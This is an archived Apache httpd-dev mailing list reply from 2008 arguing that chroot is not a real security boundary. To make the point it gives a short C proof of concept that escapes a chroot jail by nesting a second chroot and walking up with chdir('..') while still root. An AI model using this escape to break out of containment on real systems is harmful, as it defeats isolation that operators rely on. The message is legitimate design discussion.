httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Plüm, Rüdiger, VF-Group <ruediger.pl...@vodafone.com>
Subject RE: High security
Date Thu, 24 Jan 2008 12:50:54 GMT
 

> -----Original Message-----
> From: Colm MacCarthaigh [mailto:colm@allcosts.net] 
> Sent: Donnerstag, 24. Januar 2008 13:16
> To: dev@httpd.apache.org
> Subject: Re: High security
> 
> On Thu, Jan 24, 2008 at 01:10:23PM +0100, Nick Gearls wrote:
> > You specify one directive, and the only thing you have to 
> put in the 
> > jail is your htdocs and logs directories; all other files (conf, 
> > modules, httpd, libraries, etc.) are outside of the jail. 
> This is really 
> > top security - it's almost impossible to find something to hack.
> 
> Well don't kid yourself, it makes privilege escalation by 
> certain routes
> much harder, but it's not even clost to almost impossible. There are
> many forms of IPC available between the children and the root-level
> Apache process anyway, and if you manage to exploit that it's 
> game over
> anyway (including breaking out of the jail). 

Yep. chroot was never designed to be a security feature. It can make
things more difficult to leave a jailed area.

See also http://kerneltrap.org/Linux/Abusing_chroot

or have a look at

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    FILE *file;

    chroot("/tmp/zw/blah1");
    chdir("/");
    file = fopen("blah1", "w");
    fprintf(file, "Hello\n");
    fclose(file);
    mkdir("foo", 493);
    chroot("foo");
    chdir("..");
    chdir("blah2");
    file = fopen("blah2", "w");
    fprintf(file, "Hello\n");
    fclose(file);
    return 0;
}

which allows you to escape the chroot of /tmp/zw/blah1 if
you are still root at the point of time mkdir is executed
and write a file to /tmp/zw/blah2

Regards

Rüdiger

Mime
View raw message